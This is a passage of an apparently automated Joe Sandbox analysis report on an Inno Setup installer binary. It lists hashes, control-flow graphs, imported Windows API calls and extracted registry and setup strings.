                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 50010d0bf1e67ca20538272328d5149029ebf9eac084948c6b03a7b22ed785ee
                                          • Instruction ID: 68e9f664db1ed2bf8610cb003b0dcadfc033f39245ef36fc9a098e1ad1b74175
                                          • Opcode Fuzzy Hash: 50010d0bf1e67ca20538272328d5149029ebf9eac084948c6b03a7b22ed785ee
                                          • Instruction Fuzzy Hash: 41E0D83170021827D720A9594C86DF7725C975C350F40067FB949E73C2EDB59E8186ED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424219,?,00000000,00424224), ref: 00423C76
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: NtdllProc_Window
                                          • String ID:
                                          • API String ID: 4255912815-0
                                          • Opcode ID: e1688769fd7bd0d6dab607fe8fc3e2e26ffd360abf5a591b42ec6747995d87bd
                                          • Instruction ID: ae68c2cdca38ef5850f0d921292574d88cfa71f32ebb703bed3c264f3a70824c
                                          • Opcode Fuzzy Hash: e1688769fd7bd0d6dab607fe8fc3e2e26ffd360abf5a591b42ec6747995d87bd
                                          • Instruction Fuzzy Hash: 1EF0C579205609AFDB40DF9DC588D4AFBE8FF4C260B058295B988CB321C234FD818F94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: cd4705463169736317c135c968e69caf56b8538c5319c1c6acdf40a0ccdc6785
                                          • Instruction ID: 9797e56fdedcf1d2bc2f92661db947174c304adb25379886e85f9db6f22e7329
                                          • Opcode Fuzzy Hash: cd4705463169736317c135c968e69caf56b8538c5319c1c6acdf40a0ccdc6785
                                          • Instruction Fuzzy Hash: 05D0C2B120420063C700AEAA9C816D676AC8B84312F10083F7C89CA3D3EABDCB9C465B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 366 467a74-467aa4 367 467aa6-467aad 366->367 368 467aaf 366->368 369 467ab6-467aee call 40377c call 403880 call 42dd58 367->369 368->369 376 467af0-467b04 call 403880 call 42dd58 369->376 377 467b09-467b32 call 403880 call 42dc7c 369->377 376->377 385 467b34-467b3d call 4678b4 377->385 386 467b42-467b6b call 4679d0 377->386 385->386 390 467b7d-467b80 call 403548 386->390 391 467b6d-467b7b call 4035dc 386->391 395 467b85-467bd0 call 4679d0 call 42c4c4 call 467a18 call 4679d0 390->395 391->395 404 467be6-467c07 call 453d18 call 4679d0 395->404 405 467bd2-467be5 call 467a40 395->405 412 467c53-467c5a 404->412 413 467c09-467c52 call 4679d0 call 4674c0 call 4679d0 call 4674d4 call 4679d0 404->413 405->404 414 467c90-467c97 412->414 415 467c5c-467c8f call 467588 call 4679d0 call 46759c call 4679d0 412->415 413->412 419 467cd8-467cdc 414->419 420 467c99-467cd7 call 4679d0 * 3 414->420 415->414 422 467cde-467ce9 call 471af8 419->422 423 467ceb-467cf4 call 4035dc 419->423 420->419 433 467cf9-467ea9 call 4038c0 call 4679d0 call 471af8 call 467a18 call 4035dc call 4036c4 * 2 call 4679d0 call 4035dc call 4036c4 * 2 call 4679d0 call 471af8 call 467a18 call 471af8 call 467a18 call 471af8 call 467a18 call 471af8 call 467a18 call 471af8 call 467a18 call 471af8 call 467a18 call 471af8 call 467a18 call 471af8 call 467a18 call 471af8 422->433 423->433 506 467ebf-467ecd call 467a40 433->506 507 467eab-467ebd call 4679d0 433->507 511 467ed2 506->511 512 467ed3-467ee1 call 467a40 507->512 511->512 514 467ee6-467eee 512->514 515 467ef0-467f26 call 487a5c 514->515 516 467f48-467f5e RegCloseKey 514->516 515->516
                                          APIs
                                            • Part of subcall function 004679D0: 6CAD68C0.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00000001,004AE064,?,00467B63,?,00000000,00467F5F,?,_is1), ref: 004679F3
                                          • RegCloseKey.ADVAPI32(?,00467F66,?,_is1,00000001,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,00467FAE,?,?,00000001,004AE064), ref: 00467F59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Close
                                          • String ID: " /SILENT$5.1.3-beta$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$HelpLink$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallLocation$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                          • API String ID: 3535843008-636458346
                                          • Opcode ID: 0eb5021d592619fd6467be79392bb931bedcf96406f7052587208b6e7538386c
                                          • Instruction ID: 3e97a354083fd7acde89d56369ffd54066c112e9c336c80bd360b87899212aab
                                          • Opcode Fuzzy Hash: 0eb5021d592619fd6467be79392bb931bedcf96406f7052587208b6e7538386c
                                          • Instruction Fuzzy Hash: B3E1A770A041099BD704EB95D892AAF77B9EB44308F20856FE41077395EF78BE05CB6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 877 4856f8-48572c call 4037cc 880 48572e-48573d call 44706c Sleep 877->880 881 485742-48574f call 4037cc 877->881 886 485bd2-485bec call 403568 880->886 887 48577e-48578b call 4037cc 881->887 888 485751-485774 call 4470c8 call 403880 FindWindowA call 447348 881->888 895 4857ba-4857c7 call 4037cc 887->895 896 48578d-4857b5 call 4470c8 call 403880 FindWindowA call 447348 887->896 906 485779 888->906 904 4857c9-48580b call 44706c * 4 SendMessageA call 447348 895->904 905 485810-48581d call 4037cc 895->905 896->886 904->886 916 48586c-485879 call 4037cc 905->916 917 48581f-485867 call 44706c * 4 PostMessageA call 4471a0 905->917 906->886 926 4858c8-4858d5 call 4037cc 916->926 927 48587b-4858c3 call 44706c * 4 SendNotifyMessageA call 4471a0 916->927 917->886 938 485902-48590f call 4037cc 926->938 939 4858d7-4858fd call 4470c8 call 403880 RegisterClipboardFormatA call 447348 926->939 927->886 951 485950-48595d call 4037cc 938->951 952 485911-48594b call 44706c * 3 SendMessageA call 447348 938->952 939->886 964 48595f-48599f call 44706c * 3 PostMessageA call 4471a0 951->964 965 4859a4-4859b1 call 4037cc 951->965 952->886 964->886 978 4859f8-485a05 call 4037cc 965->978 979 4859b3-4859f3 call 44706c * 3 SendNotifyMessageA call 4471a0 965->979 989 485a5a-485a67 call 4037cc 978->989 990 485a07-485a25 call 4470c8 call 42e250 978->990 979->886 1001 485a69-485a95 call 4470c8 call 403880 call 44706c 6CAD5550 989->1001 1002 485ae1-485aee call 4037cc 989->1002 1010 485a37-485a45 GetLastError call 447348 990->1010 1011 485a27-485a35 call 447348 990->1011 1035 485ad1-485adc call 4471a0 1001->1035 1036 485a97-485acc call 44706c * 2 call 447348 call 4471a0 1001->1036 1013 485af0-485b11 call 44706c FreeLibrary call 4471a0 1002->1013 1014 485b16-485b23 call 4037cc 1002->1014 1019 485a4a-485a55 call 447348 1010->1019 1011->1019 1013->886 1029 485b48-485b55 call 4037cc 1014->1029 1030 485b25-485b43 call 4470c8 call 403880 CreateMutexA 1014->1030 1019->886 1041 485b8b-485b98 call 4037cc 1029->1041 1042 485b57-485b89 call 4470c8 call 4036bc call 403880 OemToCharBuffA call 44741c 1029->1042 1030->886 1035->886 1036->886 1054 485b9a-485bcc call 4470c8 call 4036bc call 403880 CharToOemBuffA call 44741c 1041->1054 1055 485bce 1041->1055 1042->886 1054->886 1055->886
                                          APIs
                                          • Sleep.KERNEL32(00000000,00000000,00485BED,?,?,?,?,00000000,00000000,00000000), ref: 00485738
                                          • FindWindowA.USER32 ref: 00485769
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: FindSleepWindow
                                          • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                          • API String ID: 3078808852-3310373309
                                          • Opcode ID: 5e4ea56c2af6ebe0cd1ae4fb0b3339d99741b5ae9b9cfa6db2d405cfe1a2adb2
                                          • Instruction ID: a477a937e49ace85969f4353279384d416924bf77b43f5789cabccee374076e0
                                          • Opcode Fuzzy Hash: 5e4ea56c2af6ebe0cd1ae4fb0b3339d99741b5ae9b9cfa6db2d405cfe1a2adb2
                                          • Instruction Fuzzy Hash: B9C140A0B086015BDB14BF7E8C8691F55999F88704720D93FB446EB78BCE3CED0A4359
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1400 478258-47827d GetModuleHandleA 6CAD5550 1401 4782e4-4782e9 GetSystemInfo 1400->1401 1402 47827f-478295 GetNativeSystemInfo 6CAD5550 1400->1402 1404 4782ee-4782f7 1401->1404 1403 478297-4782a2 GetCurrentProcess 1402->1403 1402->1404 1403->1404 1413 4782a4-4782a8 1403->1413 1405 478307-47830e 1404->1405 1406 4782f9-4782fd 1404->1406 1409 478329-47832e 1405->1409 1407 478310-478317 1406->1407 1408 4782ff-478303 1406->1408 1407->1409 1411 478305-478322 1408->1411 1412 478319-478320 1408->1412 1411->1409 1412->1409 1413->1404 1415 4782aa-4782b1 call 4512d0 1413->1415 1415->1404 1418 4782b3-4782c0 6CAD5550 1415->1418 1418->1404 1419 4782c2-4782d9 GetModuleHandleA 6CAD5550 1418->1419 1419->1404 1420 4782db-4782e2 1419->1420 1420->1404
                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00478269
                                          • 6CAD5550.KERNEL32(00000000,GetNativeSystemInfo,kernel32.dll), ref: 00478276
                                          • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00478284
                                          • 6CAD5550.KERNEL32(00000000,IsWow64Process), ref: 0047828C
                                          • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00478298
                                          • 6CAD5550.KERNEL32(00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004782B9
                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004782CC
                                          • 6CAD5550.KERNEL32(00000000,advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004782D2
                                          • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004782E9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550$HandleInfoModuleSystem$CurrentNativeProcess
                                          • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                          • API String ID: 3480996200-2623177817
                                          • Opcode ID: 7b47165dbd981a408bc2786a271a0a7f06fd2e08640aa44ab4db1ba7637f98b1
                                          • Instruction ID: 46d5fe1d6d5815e07bab5a4b40e1e10a51b1c8387462ed9a08c7b8fdd4530e95
                                          • Opcode Fuzzy Hash: 7b47165dbd981a408bc2786a271a0a7f06fd2e08640aa44ab4db1ba7637f98b1
                                          • Instruction Fuzzy Hash: 5611D334284F41A5D61063BA5D9EBEF17488B01B59F18896F7C48A52D3DD7EC8408B7F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1421 462be8-462c20 call 471af8 1424 462c26-462c36 call 46eef4 1421->1424 1425 462e02-462e1c call 403568 1421->1425 1430 462c3b-462c80 call 407988 call 403880 call 42dcb4 1424->1430 1436 462c85-462c87 1430->1436 1437 462c8d-462ca2 1436->1437 1438 462df8-462dfc 1436->1438 1439 462cb7-462cbe 1437->1439 1440 462ca4-462cb2 call 42dbe4 1437->1440 1438->1425 1438->1430 1442 462cc0-462ce2 call 42dbe4 call 42dbfc 1439->1442 1443 462ceb-462cf2 1439->1443 1440->1439 1442->1443 1460 462ce4 1442->1460 1444 462cf4-462d19 call 42dbe4 * 2 1443->1444 1445 462d4b-462d52 1443->1445 1467 462d1b-462d24 call 40c504 1444->1467 1468 462d29-462d3b call 42dbe4 1444->1468 1447 462d54-462d66 call 42dbe4 1445->1447 1448 462d98-462d9f 1445->1448 1461 462d76-462d88 call 42dbe4 1447->1461 1462 462d68-462d71 call 40c504 1447->1462 1453 462da1-462dd5 call 42dbe4 * 3 1448->1453 1454 462dda-462df0 RegCloseKey 1448->1454 1453->1454 1460->1443 1461->1448 1475 462d8a-462d93 call 40c504 1461->1475 1462->1461 1467->1468 1468->1445 1478 462d3d-462d46 call 40c504 1468->1478 1475->1448 1478->1445
                                          APIs
                                            • Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          • RegCloseKey.ADVAPI32(?,00462E02,?,?,00000001,00000000,00000000,00462E1D,?,00000000,00000000,?), ref: 00462DEB
                                          Strings
                                          • Inno Setup: Deselected Tasks, xrefs: 00462D79
                                          • Inno Setup: No Icons, xrefs: 00462CD3
                                          • Inno Setup: Setup Type, xrefs: 00462CFA
                                          • Inno Setup: User Info: Serial, xrefs: 00462DCD
                                          • %s\%s_is1, xrefs: 00462C65
                                          • Inno Setup: Selected Tasks, xrefs: 00462D57
                                          • Inno Setup: User Info: Organization, xrefs: 00462DBA
                                          • Inno Setup: Icon Group, xrefs: 00462CC6
                                          • Inno Setup: App Path, xrefs: 00462CAA
                                          • Inno Setup: Deselected Components, xrefs: 00462D2C
                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00462C47
                                          • Inno Setup: Selected Components, xrefs: 00462D0A
                                          • Inno Setup: User Info: Name, xrefs: 00462DA7
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD6790
                                          • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                          • API String ID: 3513276378-1093091907
                                          • Opcode ID: 17edf25954bddf7f48825c5b40fd28439f017680b5dc4ad28f048a29b95886a0
                                          • Instruction ID: 14966b6133968fffe3011c3084ea855d64415c2e69430a5297c16372ad3f805f
                                          • Opcode Fuzzy Hash: 17edf25954bddf7f48825c5b40fd28439f017680b5dc4ad28f048a29b95886a0
                                          • Instruction Fuzzy Hash: 9F51C730A00A14ABCB15DB65DA51BDEBBF4EF48304F90847BE850A7391E778AE05CB1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1480 46b48c-46b4bf 1481 46b4c5-46b4c9 1480->1481 1482 46bb28-46bb5c call 467024 call 403548 * 2 call 403568 1480->1482 1484 46b4d0-46b50d call 40b504 call 46f564 1481->1484 1493 46b513-46b552 call 473140 call 46f1f8 call 471af8 * 2 1484->1493 1494 46bb1c-46bb22 1484->1494 1506 46b554 1493->1506 1507 46b558-46b55f 1493->1507 1494->1482 1494->1484 1506->1507 1508 46b561-46b568 1507->1508 1509 46b578-46b591 1507->1509 1512 46b574 1508->1512 1513 46b56a-46b56f call 451de8 1508->1513 1510 46b5b7-46b5be 1509->1510 1511 46b593-46b59d call 46b344 1509->1511 1515 46b5c0-46b5c7 1510->1515 1516 46b5cd-46b5d4 1510->1516 1511->1510 1522 46b59f-46b5b2 call 403880 call 42dd58 1511->1522 1512->1509 1513->1512 1515->1516 1519 46b9f9-46ba2f 1515->1519 1520 46b5d6-46b5dd 1516->1520 1521 46b627-46b647 call 46b368 1516->1521 1519->1509 1529 46ba35-46ba3c 1519->1529 1520->1521 1524 46b5df-46b601 call 403880 call 42dcb4 1520->1524 1533 46b6ba-46b6c1 1521->1533 1534 46b649-46b66e call 403880 call 42dc7c 1521->1534 1522->1510 1524->1519 1553 46b607-46b622 call 403880 6CAD6690 RegCloseKey 1524->1553 1530 46ba3e-46ba48 call 46b344 1529->1530 1531 46ba6f-46ba76 1529->1531 1530->1531 1554 46ba4a-46ba6a call 4573c8 1530->1554 1539 46ba78-46ba82 call 46b344 1531->1539 1540 46baa9-46bab0 1531->1540 1537 46b6c3-46b6e7 call 403880 call 42dcb4 1533->1537 1538 46b70a 1533->1538 1569 46b673-46b677 1534->1569 1544 46b70f-46b711 1537->1544 1582 46b6e9-46b6ec 1537->1582 1538->1544 1539->1540 1568 46ba84-46baa4 call 4573c8 1539->1568 1550 46bab2-46bad8 call 4573c8 1540->1550 1551 46badd-46bae4 1540->1551 1544->1519 1552 46b717-46b72c 1544->1552 1550->1551 1559 46bae6-46bb0c call 4573c8 1551->1559 1560 46bb11-46bb17 call 46f224 1551->1560 1562 46b740-46b747 1552->1562 1563 46b72e-46b73b call 403880 6CAD6690 1552->1563 1553->1519 1554->1531 1559->1560 1560->1494 1572 46b74d-46b754 1562->1572 1573 46b9db-46b9f1 RegCloseKey 1562->1573 1563->1562 1568->1540 1576 46b69e-46b6a5 1569->1576 1577 46b679-46b67d 1569->1577 1580 46b756-46b76a call 403880 call 42dbfc 1572->1580 1581 46b770-46b77c 1572->1581 1576->1544 1578 46b6a7-46b6b8 call 4678b4 1576->1578 1577->1544 1583 46b683-46b69c call 46b368 1577->1583 1578->1544 1580->1573 1580->1581 1587 46b794-46b79e 1581->1587 1588 46b77e 1581->1588 1582->1544 1586 46b6ee-46b6f5 1582->1586 1583->1544 1586->1544 1594 46b6f7-46b708 call 4678b4 1586->1594 1590 46b7a7-46b7ac 1587->1590 1591 46b7a0-46b7a3 1587->1591 1595 46b936-46b96f call 471af8 call 406e2c call 403880 6CAD68C0 1588->1595 1596 46b784-46b786 1588->1596 1600 46b7b3-46b7b5 1590->1600 1598 46b7a5 1591->1598 1599 46b7ae 1591->1599 1594->1544 1595->1573 1636 46b971-46b978 1595->1636 1604 46b78c-46b78e 1596->1604 1605 46b98d-46b9bf call 4036bc call 403880 * 2 6CAD68C0 1596->1605 1598->1600 1599->1600 1607 46b852-46b864 call 4039a4 1600->1607 1608 46b7bb-46b7cd call 4039a4 1600->1608 1604->1573 1604->1587 1605->1573 1642 46b9c1-46b9c8 1605->1642 1624 46b866-46b87d call 403880 call 42dbf0 1607->1624 1625 46b87f-46b882 call 403548 1607->1625 1621 46b7cf-46b7e6 call 403880 call 42dbe4 1608->1621 1622 46b7e8-46b7eb call 403548 1608->1622 1621->1622 1632 46b7f0-46b7f7 1621->1632 1622->1632 1624->1625 1633 46b887-46b8c0 call 471b18 1624->1633 1625->1633 1639 46b828-46b84d call 471b18 1632->1639 1640 46b7f9-46b817 call 403880 RegQueryValueExA 1632->1640 1654 46b8c2-46b8d2 call 4036bc 1633->1654 1655 46b8e1-46b90d call 4036bc call 403880 * 2 6CAD68C0 1633->1655 1636->1573 1644 46b97a-46b98b call 4678b4 1636->1644 1639->1655 1640->1639 1658 46b819-46b81d 1640->1658 1642->1573 1650 46b9ca-46b9d6 call 4678b4 1642->1650 1644->1573 1650->1573 1654->1655 1665 46b8d4-46b8dc call 4036c4 1654->1665 1655->1573 1671 46b913-46b91a 1655->1671 1661 46b825 1658->1661 1662 46b81f-46b823 1658->1662 1661->1639 1662->1639 1662->1661 1665->1655 1671->1573 1672 46b920-46b931 call 4678b4 1671->1672 1672->1573
                                          APIs
                                          • 6CAD6690.ADVAPI32(?,00000000,?,00000002,00000000,00000000,0046BA03,?,?,?,?,00000000,0046BB5D,?,?,00000001), ref: 0046B614
                                          • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,0046BA03,?,?,?,?,00000000,0046BB5D,?,?), ref: 0046B61D
                                          • 6CAD6690.ADVAPI32(?,00000000,00000000,0046B9F2,?,?,00000000,0046BA03,?,?,?,?,00000000,0046BB5D,?,?), ref: 0046B73B
                                            • Part of subcall function 0042DC7C: 6CAD64E0.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DCA8
                                          • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,0046B9F2,?,?,00000000,0046BA03,?,?,?,?), ref: 0046B810
                                          • 6CAD68C0.ADVAPI32(?,00000000,00000000,00000002,00000000,00000001,?,00000000,0046B9F2,?,?,00000000,0046BA03,?,?,?), ref: 0046B904
                                          • 6CAD68C0.ADVAPI32(?,00000000,00000000,00000004,?,00000004,00000000,0046B9F2,?,?,00000000,0046BA03,?,?,?,?), ref: 0046B966
                                          • 6CAD68C0.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000,00000000,0046B9F2,?,?,00000000,0046BA03,?,?,?,?), ref: 0046B9B6
                                          • RegCloseKey.ADVAPI32(?,0046B9F9,?,00000000,0046BA03,?,?,?,?,00000000,0046BB5D,?,?,00000001,004AE064), ref: 0046B9EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD6690$QueryValue
                                          • String ID: Cannot access 64-bit registry keys on this version of Windows$break$dJ$olddata${olddata}
                                          • API String ID: 1650330858-3083077437
                                          • Opcode ID: 65f3144aefbda9cece841e54d27e662fc1e0a683af48279e37bbe27d79f3963f
                                          • Instruction ID: 471098541b2f653e8403ac396bc0f68c9be0cc512637e3bdc5dd47f0662afdfc
                                          • Opcode Fuzzy Hash: 65f3144aefbda9cece841e54d27e662fc1e0a683af48279e37bbe27d79f3963f
                                          • Instruction Fuzzy Hash: C0221D74A01248AFDB10EF99D985B9EB7F9EF08304F504066F904EB362D738AD45CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1834 42393c-423946 1835 423a6f-423a73 1834->1835 1836 42394c-42396e call 41f48c GetClassInfoA 1834->1836 1839 423970-423987 RegisterClassA 1836->1839 1840 42399f-4239a8 GetSystemMetrics 1836->1840 1839->1840 1843 423989-42399a call 408d50 call 403264 1839->1843 1841 4239aa 1840->1841 1842 4239ad-4239b7 GetSystemMetrics 1840->1842 1841->1842 1845 4239b9 1842->1845 1846 4239bc-423a18 call 403880 call 4063f4 call 403548 call 423714 SetWindowLongA 1842->1846 1843->1840 1845->1846 1857 423a32-423a60 GetSystemMenu DeleteMenu * 2 1846->1857 1858 423a1a-423a2d call 424240 SendMessageA 1846->1858 1857->1835 1860 423a62-423a6a DeleteMenu 1857->1860 1858->1857 1860->1835
                                          APIs
                                            • Part of subcall function 0041F48C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EE6C,?,00423957,00423CD4,0041EE6C), ref: 0041F4AA
                                          • GetClassInfoA.USER32 ref: 00423967
                                          • RegisterClassA.USER32 ref: 0042397F
                                          • GetSystemMetrics.USER32 ref: 004239A1
                                          • GetSystemMetrics.USER32 ref: 004239B0
                                          • SetWindowLongA.USER32 ref: 00423A0C
